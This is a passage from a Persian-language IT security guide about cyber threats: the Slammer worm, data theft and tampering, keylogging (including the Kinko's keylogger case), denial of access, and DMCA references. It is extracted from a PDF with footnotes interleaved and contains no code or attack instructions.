ﺗﻨﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻋـﺮﺽ ﻳـﻚ ﺧﻴﺎﺑـﺎﻥ ﺑـﺎ ﺁﻥ ﻫـﺪﻑ ﻓﺎﺻـﻠﻪ ﺩﺍﺭﺩ
ﺧﺪﺷﻪﺩﺍﺭ ﻧﻤﺎﻳﺪ .ﺗﻬﺪﻳﺪ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻫـﺮ
ﺟﺎﻱ ﺷﺒﻜﻪ ﺷﺮﻭﻉ ﺷﻮﺩ ﻭ ﺑﻪ ﺳﻤﺖ ﻫﺪﻓﻲ ﻣﻌﻠـﻮﻡ ﻭ ﻣـﺸﺨﺺ
ﺟﻬﺖﮔﻴﺮﻱ ﻛﻨـﺪ؛ ﻭ ﻫـﺪﻑ ﻧﻴـﺰ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ
ﺍﻧﺘﺨﺎﺏ ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﺗﻬﺪﻳﺪﺍﺕ ﺧﻄﺮﻧﺎﻙ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﻛـﻪ
ﻣﺎ ﻧﺤﻮﺓ ﺗﻔﻜﺮ ﺧﻮﺩ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ ﺭﺍ ﺗﻐﻴﻴـﺮ ﺩﻫـﻴﻢ .ﻣـﻲﺗـﻮﺍﻥ
ﮔﻔﺖ ﺍﻳﻦ ﻫﻴﭻ ﺍﺭﺯﺷـﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺩﺭ ﺁﻳـﻴﻦﻧﺎﻣـﺔ ﺣـﻖ ﺗﻜﺜﻴـﺮ
Digital Millenniumﻃﺮﺍﺣـﻲ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗﻔـﻞﺷـﻜﻦ
ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﻋﻼﻡ ﺷﻮﺩ؛ ﭼﺮﺍﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻛﻤﻴﺘﻪﻫﺎﻱ ﻣﻠﻲ ﻭ
ﺟﻬﺎﻧﻲ ﺣﻖ ﺗﻜﺜﻴﺮ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿـﻮﻉ ﻭ ﺳـﺎﻳﺮ ﻣـﻮﺍﺭﺩ ﻣـﺮﺗﺒﻂ ﺑـﻪ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ،ﻫﻨﻮﺯ ﻣﺸﻐﻮﻝ ﺗـﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫـﺎﻱ ﺍﺟﺮﺍﻳـﻲ
٥١
ﻫﺴﺘﻨﺪ.
ﺳﻮﻡ :ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﺤﻴﻄـﻲ ﻗﺪﺭﺗﻤﻨـﺪ ﺍﻣـﺎ ﭘﻴﭽﻴـﺪﻩ ﺭﺍ ﺑﻮﺟـﻮﺩ
ﺁﻭﺭﺩﻩ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻘﺶ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﺮ ﻋﻬﺪﺓ ﭼﻨﺪ ﺑﺎﺯﻳﮕﺮ ﺍﺳﺖ.
ﻼ ﺍﮔﺮ ﺷـﻤﺎ ﻳﻜـﻲ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﻳـﻚ ISPﺑﺎﺷـﻴﺪ ،ﺭﺍﻫﻬـﺎﻱ
ﻣﺜ ﹰ
ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺧﻮﺩ ﻭ ﺭﺍﻳﺎﻧـﻪ ﺷﺨـﺼﻲﺗـﺎﻥ ﭘـﻴﺶِﺭﻭ
ﺩﺍﺭﻳﺪ؛ ﻫﺮﭼﻨﺪ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ISPﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ
ﺧﻮﺩ ﻳﺎ ﻧﺤﻮﺓ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻧﺮﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲﺗﻮﺍﻧﻴـﺪ
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ؛ ﺣﺘﻲ
ﺍﮔﺮ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺰﺩﻳﻚ ﺑﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻧﻬﺎ ﺑﺎﺷﻴﺪ .ﭘﺲ ﺑﺎﻳﺪ ﻳـﻚ
ﺍﺳﺘﺮﺍﺗﮋﻱ ﺣﻔﺎﻇﺘﻲ ﺑﺮﺍﻱ ﺳﺮﻣﺎﻳﻪﻫﺎﻳﺘـﺎﻥ ﺍﺗﺨـﺎﺫ ﻛﻨﻴـﺪ ،ﭼﺮﺍﻛـﻪ
ﻃﺒﻖ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﻛﺮﻡ ﻣﺬﻛﻮﺭ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳـﻦ
ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺣﺪﺍﻗﻞ ۷۵ﻫﺰﺍﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻴﺰﺑﺎﻥ ﺭﺍ ﺁﻟﻮﺩﻩ ﻛﺮﺩ
ﻛﻪ ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻭﺍﻗﻌﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﻣﻴﺰﺍﻥ ﺍﺳﺖ -ﻭ ﻣﻮﺟﺐ ﺍﺧﺘﻼﻝ ﺷﺪﻳﺪ ﺩﺭ ﻛـﺎﺭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺑـﺮﻭﺯ ﻧﺘـﺎﻳﺞ
Moore, Paxson, Savage, Shannon, Staniford
and Weaver,"Inside the Slammer Worm,"IEEE
Security and Privacy,Vol.1,No.4,July/August
2003, pp.33-39.
٥١
Hosts
Universal Time Coordinated
Buffer Overflow Vulnerability
David Litchfield
http://www.microsoft.com/security/
slammer.asp
45
46
47
48
49
ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻧﻈﺮﺍﺕ ﺟﺪﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺳﻨﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻣﺮﺍﺟـﻊ
ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
U.S. Copyright Office Digital Millennium
Copyright Act Study:
http://www.copyright.gov/reports/studies/dmca
/dmca_study.html
DMCA:
http://www.copyright.gov/legislation/hr2281.pdf
50
ﺑﺨﺶ ﺍﻭﻝ
ﺯﻳﺎﺩﻱ ﻣﻲﺑﺮﻧﺪ .ﺩﺭﺳﻲ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻣﻄﻠـﺐ ﮔﺮﻓﺘـﻪ ﻣـﻲﺷـﻮﺩ ﺁﻥ
ﺍﺳﺖ ﻛﻪ ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﻭ ﺑﺎﺯﺩﺍﺭﻧﺪﻩ ﺑﺎﻳﺪ ﺍﺯ ﺍﺳﺘﻴﻼﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ
ﺗﺸﺨﻴﺺ ﻧﻘﺾ ﺣﺮﻳﻢ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺣﻴﻦ ﻭﻗﻮﻉ ﺟﺮﻡ ﻳﺎ ﭘﺲ ﺍﺯ ﺁﻥ
ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﻨﺪ.
ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩﺍﻱ ﭼﻮﻥ ﻟﻐﻮ ﭘﺮﻭﺍﺯﻫﺎﻱ ﻫﻮﺍﻳﻲ ،ﺍﺧﺘﻼﻝ ﺩﺭ
ﺍﻧﺘﺨﺎﺑﺎﺕ ،ﻭ ﺑﺮﻭﺯ ﺍﺷﻜﺎﻝ ﺩﺭ ﻛﺎﺭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺧـﻮﺩﭘﺮﺩﺍﺯ
٥٠
ﺷﺪ.
٣٨
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﻲﺩﺍﻧﻴﺪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺩﻧﻴﺎﻱ ﺑﻴﺮﻭﻥ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻧﺘﻮﺍﻧﻴـﺪ
ﺗﻤﺎﻡ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺧﻨﺜﻲ ﻧﻤﺎﻳﻴﺪ.
ﻣﺨــﺎﻃﺮﺍﺕ ﻣﺤﺘﻤــﻞ ﺩﺭ ﻓــﻀﺎﻱ ﺳــﺎﻳﺒﺮ ﭼﻴــﺴﺘﻨﺪ؟ ﺍﮔــﺮ ﻫــﻴﭻ
ﻣﻼﺣﻈﺔ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﻧﺪﺍﺩﻩ ﺑﺎﺷﻴﺪ ﺑﻌﻀﻲ ﻧﺘﺎﻳﺠﻲ ﻛـﻪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﺗﺨﺮﻳﺐ ﺍﻃﻼﻋﺎﺕ -ﺩﺍﺩﻩ ﻫﺎﻱ ﺫﺧﻴـﺮﻩﺷـﺪﻩ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ
ﻻ ﺍﻣﻜـﺎﻥ
ﺷﻤﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺣـﺬﻑ ﺷـﻮﻧﺪ .ﺍﻟﺒﺘـﻪ ﻣﻌﻤـﻮ ﹰ
ﻻ
ﺑﺎﺯﻳﺎﺑﻲ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺍﻣﺎ ﻓﺮﺁﻳﻨﺪﻱ ﺯﻣﺎﻥﺑـﺮ ﻭ ﺍﺣﺘﻤـﺎ ﹰ
ﻧﺎﻗﺺ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﮔﺮ ﻳﻚ ﻣﺆﺳﺴﺔ ﺩﻭﻟﺘﻲ ﺑﺎﺷﻴﺪ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﺘﺎﻥ ﺣﻴﻦ ﺍﻳﻦ ﺩﻭﺭﻩ ﺩﭼﺎﺭ ﺍﺧﺘﻼﻝ ﺷﻮﺩ.
ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﻧﻘـﺾ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ -ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺍﺯ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﻼﻓﺎﺻﻠﻪ ﻳـﺎ ﺑـﺎ ﺗـﺄﺧﻴﺮ ﻣﻄﻠـﻊ
ﺷﻮﻳﺪ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺯ ﺍﻳﻨﻜـﻪ ﻣﺘﻮﺟـﻪ ﺷـﻮﻳﺪ ﭼـﻪ ﻛـﺴﻲ
ﺩﺍﺩﻩﻫﺎﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﮔﺮﻓﺘـﻪ ،ﭼـﻪ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺍﻭﺳﺖ ،ﻳﺎ ﺑﺎ ﺁﻧﻬﺎ ﭼﻪ ﻛﺎﺭﻫـﺎﻳﻲ ﺍﻧﺠـﺎﻡ ﺧﻮﺍﻫـﺪ ﺩﺍﺩ
ﻼ ﻣﺠﺰﺍﺳﺖ .ﺍﮔﺮ ﺣﺠﻢ ﻭﺳﻴﻌﻲ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ
ﻛﺎﻣ ﹰ
ﺷﻤﺎ ﺑـﻪ ﺳـﺮﻗﺖ ﺭﻓﺘـﻪ ﺑﺎﺷـﺪ ﺑـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩ ﺳـﺎﺭﻕ
ﺍﻃﻼﻋﺎﺕ ﻛﻠﻴﺪﻱ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ
ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﺎﻳﺠﻲ ﻧﺎﻣﻌﻠﻮﻡ ﻭ ﺗﺎ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺧﻄﺮﻧـﺎﻙ ﺩﺭ ﭘـﻲ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻧﻘﺾ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺍﻃﻼﻋﺎﺕ -ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺭﺍﻳﺎﻧﻪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﺷﻤﺎ ﺗﻐﻴﻴﺮ ﻛﻨﻨـﺪ ﻭ ﺩﺳـﺘﻜﺎﺭﻱ
ﺷﻮﻧﺪ .ﺑﺮ ﺍﺳﺎﺱ ﻧﻮﻉ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻴـﺪ
ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﺩﺳﺘﻜﺎﺭﻱ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻘﻄﻌﻲ ﻳﺎ ﺩﺭﺍﺯﻣﺪﺕ ﺑﺎﺷـﺪ.
ﺍﮔﺮ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺷﺎﻣﻞ ﺳﻮﺍﺑﻖ ﻣﺎﻟﻲ ،ﺍﻃﻼﻋﺎﺕ ﻣـﺸﺘﺮﻳﺎﻥ،
ﻭﺿﻌﻴﺖ ﺳﻔﺎﺭﺷـﺎﺕ ﻳـﺎ ﭘﺮﻭﻧـﺪﻩﻫـﺎﻱ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺑﺎﺷـﻨﺪ،
ﭘﻴﺎﻣﺪﻫﺎﻱ ﻧﻘﺾ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﺁﻧﻬـﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺴﻴﺎﺭ
ﭘﺮﻫﺰﻳﻨﻪ ﻭ ﺯﻳﺎﻧﺒﺎﺭ ﺑﺎﺷﺪ.
ﻧﻘﺾ ﺍﻧﺴﺠﺎﻡ ﺷﺒﻜﻪ ﺍﺯ ﻃﺮﻳﻖ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ
ﻫﺮﭼﻨﺪ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺑﻪ ﻃﻮﺭ ﻣﺴﺘﻘﻴﻢ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗـﺮﺍﺭﻧﮕﺮﻓﺘﻪﺍﻳﺪ ،ﻭﻟﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺩﻳﮕﺮﻱ ﻛـﻪ ﺑـﻪ
ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪﺍﻳﺪ ﻣﻮﺭﺩ ﺣﻤﻠـﻪ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ ﻭ ﺍﻳـﻦ
ﻣﺴﺌﻠﻪ ﺭﻭﻱ ﺷﻤﺎ ﻧﻴﺰ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺎﺷـﺪ .ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﺍﮔـﺮ
ﻼ ﻳﻚ ﻣﺆﺳـﺴﺔ ﻣـﺎﻟﻲ ﻭ ﺍﻋﺘﺒـﺎﺭﻱ ﺑﺎﺷـﻴﺪ ﺣـﻴﻦ ﺩﻭﺭﺓ
ﻣﺜ ﹰ
ﺑﺎﺯﻳﺎﺑﻲ ﺍﻃﻼﻋﺎﺕ ﻗﺎﺩﺭ ﺑﻪ ﺗﻜﻤﻴﻞ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﻣﺎﻟﻲ ﺧـﻮﺩ
ﻧﺨﻮﺍﻫﻴﺪ ﺑﻮﺩ.
ﺛﺒﺖ ﻛﻠﻴﺪﻫﺎ -ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻨﻬﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺭﻭﻱ ﺭﺍﻳﺎﻧـﺔ
ﺷﻤﺎ ﻧﺼﺐ ﺷﻮﻧﺪ ﻛﻪ ﻓﺸﺮﺩﻩﺷﺪﻥ ﺩﻛﻤﻪﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴـﺪ
ﺗﻮﺳﻂ ﺷﻤﺎ ﺭﺍ ﺛﺒﺖ ﻛـﺮﺩﻩ ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﻳﮕـﺮ
ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ ﻣﻨـﺎﺑﻊ
٥٢
ﺧﺎﺭﺟﻲ ﻧﻈﻴﺮ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ
ﻣﺤﺎﻓﻈﺖﺷﺪﻩ ،ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ ﭘـﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻧﻘــﻞ ﻭ ﺍﻧﺘﻘــﺎﻻﺕ ﻣــﺎﻟﻲ ،ﻭ ﻳــﺎ ﺩﺭﻳﺎﻓــﺖ
ﺍﻃﻼﻋﺎﺕ ﻣﺤﺮﻣﺎﻧﻪ ﺭﺍ ﺩﭼـﺎﺭ ﺍﺷـﻜﺎﻝ ﻛﻨـﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟـﺖ
ﺳﺎﺭﻕ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻧﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،٥٣ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ
ﺍﻋﺘﺒﺎﺭﻱ ،ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ ﻭ ﺩﺭ ﺁﻳﻨﺪﻩ
ﺑﺮﺍﻱ ﻣﻨﺎﻓﻊ ﺷﺨﺼﻲ ﺧﻮﺩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﺪ.
ﻣﻨﻊ ﺩﺳﺘﺮﺳﻲ - ٥٤ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺷـﻤﺎ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﺑـﻪ
ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﻣﺤﺮﻭﻡ ﺷـﻮﻳﺪ ،ﺣﺘـﻲ ﺍﮔـﺮ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ
ﻼ ﺍﻣﻜـﺎﻥ ﺩﺍﺭﺩ ﺍﻃﻼﻋـﺎﺕ ﺷـﻤﺎ ﺩﺭ
ﭘﺎﻙ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ .ﻣﺜ ﹰ
ﻗﺎﻟﺒﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩﺍﻱ ﻇﺎﻫﺮ ﺷـﻮﻧﺪ ﻭ ﺗﻨﻬـﺎ ﻣﻬـﺎﺟﻢ
ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﻫﺰﻳﻨﺔ ﺗﺮﻣﻴﻢ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺯ ﻫـﺮ ﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﺣﻤـﻼﺕ ﻗﺎﺑـﻞ
ﻣﻼﺣﻈﻪ ﺍﺳﺖ ﻭ ﺑﺎﺯﻳﺎﺑﻲ ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﺎﻣﻤﻜﻦ ﺑﻨﻈﺮ ﻣﻲﺁﻳـﺪ.
ﺍﮔﺮ ﺷﻤﺎ ﻣﺪﻳﺮ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﺒﻠﻴﻐﺎﺗﻲ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑـﻪ ﻣﻨـﺎﺑﻊ ﺩﺍﺩﻩﺍﻱ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻭﺍﺑـﺴﺘﮕﻲ ﺷـﺪﻳﺪ ﺩﺍﺭﺩ ،ﻳـﻚ ﺣﻤﻠـﺔ ﻣﺨـﺮﺏ
ﻣﻲ ﺗﻮﺍﻧﺪ ﻣﻮﺟﺐ ﻭﺭﺷﻜﺴﺘﮕﻲ ﻣﺆﺳﺴﻪ ﺷﻤﺎ ﮔﺮﺩﺩ .ﺗﻮﺟﻪ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻴﺪ ﻛﻪ ﻛﺮﻡ Slammerﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺭﺍ ﺁﻟﻮﺩﻩ ﻣﻲﻛـﺮﺩ ﻛـﻪ
ﻭﺻﻠﺔ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺭﻭﻱ ﺁﻧﻬﺎ ﻧﺼﺐ ﻧﺸﺪﻩ ﺑﻮﺩ.
ﻳﻜــﻲ ﺍﺯ ﻧﻔﻮﺫﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻛــﻪ ﺑــﻴﺶ ﺍﺯ ﻳﻜــﺴﺎﻝ ﻓﻌﺎﻟﻴــﺖ
ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺩﺍﺷﺖ ﺭﻭﺷﻬﺎﻱ ﻧﻮﻳﻨﻲ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻛﺸﻴﺪ ﻛـﻪ ﺑـﺎ
ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺧﺪﺷﻪﺩﺍﺭ ﻛﺮﺩ:
" ﺁﺳﻮﺷﻴﺘﺪ ﭘـﺮﺱ )ﻧﻴﻮﻳـﻮﺭﻙ( -ﺑـﺮﺍﻱ ﺑـﻴﺶ ﺍﺯ ﻳﻜـﺴﺎﻝ،
ﺟﻮﺟﻮ ﺟﻴﺎﻧﮓ ٥٥ﺑﺪﻭﻥ ﺍﻃﻼ ﹺﻉ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫـﺎﻱ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺭ ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﻛﻴﻨﻜﻮ ٥٧ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﺍﺳﺘﻔﺎﺩﻩ
ﻣﻲﻛﺮﺩﻧﺪ ،ﺁﻧﭽﻪ ﻛﻪ ﺁﻧﻬﺎ ﺗﺎﻳﭗ ﻣﻲﻛﺮﺩﻧﺪ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﺮﺩ.
ﺟﻴﺎﻧﮓ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻴﺎﻧﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍ ﺩﺭ ﺣﺪﺍﻗﻞ ﭼﻬﺎﺭﺩﻩ
ﻓﺮﻭﺷﮕﺎﻩ ﻛﻴﻨﻜﻮ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺴﺖ ﻓﺸﺮﺩﻥ
٥٦
Web Server
Authentication Tokens
Denial of Access
Juju Jiang
Terminals
Kinko's Stores
52
53
54
55
56
57
٣٩
ﺑﺨﺶ ﺍﻭﻝ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ
ﺍﻳﻦ ﭘﺮﻭﻧﺪﻩ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳـﻞ ﺍﻳـﻦ ﻣـﺎﻩ ﭘـﺲ ﺍﺯ ﺩﺳـﺘﮕﻴﺮﻱ
ﺟﻴﺎﻧﮓ ﻣﻨﺠﺮ ﺑﻪ ﺗﻌﻴﻴﻦ ﻣﺠﺎﺯﺍﺕ ﺑﺮﺍﻱ ﻭﻱ ﺷﺪ ﺧﻄﺮﻫﺎﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺭ ﻛـﺎﻓﻲﻧـﺖﻫـﺎ،
ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫـﺎ ،ﻓﺮﻭﺩﮔﺎﻫﻬـﺎ ﻭ ﺩﻳﮕـﺮ ﻣﺆﺳـﺴﺎﺕ ﺭﺍ ﺁﺷـﻜﺎﺭ
ﻣﻲﺳـﺎﺯﺩ .ﻧﻴـﻞ ﻣﻬﺘـﺎ ٥٨ﻣﻬﻨـﺪﺱ ﭘـﮋﻭﻫﺶ ﺩﺭ ﻣﺆﺳـﺴﺔ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ ﺍﻳﻨﺘﺮﻧﺘﻲ ٥٩ﻫﺸﺪﺍﺭ ﻣﻲﺩﻫﺪ ﻛﻪ "ﻫﻨﮕـﺎﻡ
ﺶ ﻋﺮﻓـﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﺮ ﻳﻚ ﺍﺯ ﭘﺎﻳﺎﻧﻪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺍﺯ ﺩﺍﻧ ﹺ
ﺧﻮﺩ ﺑﻬﺮﻩ ﺑﮕﻴﺮﻳﺪ .ﺑـﺮﺍﻱ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺭﻭﺯﻣـﺮﻩ
ﻧﻈﻴﺮ ﺍﺗﺼﺎﻝ ﺑـﻪ ﻭﺏ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺎ ﻣـﺸﻜﻠﻲ ﻣﻮﺍﺟـﻪ
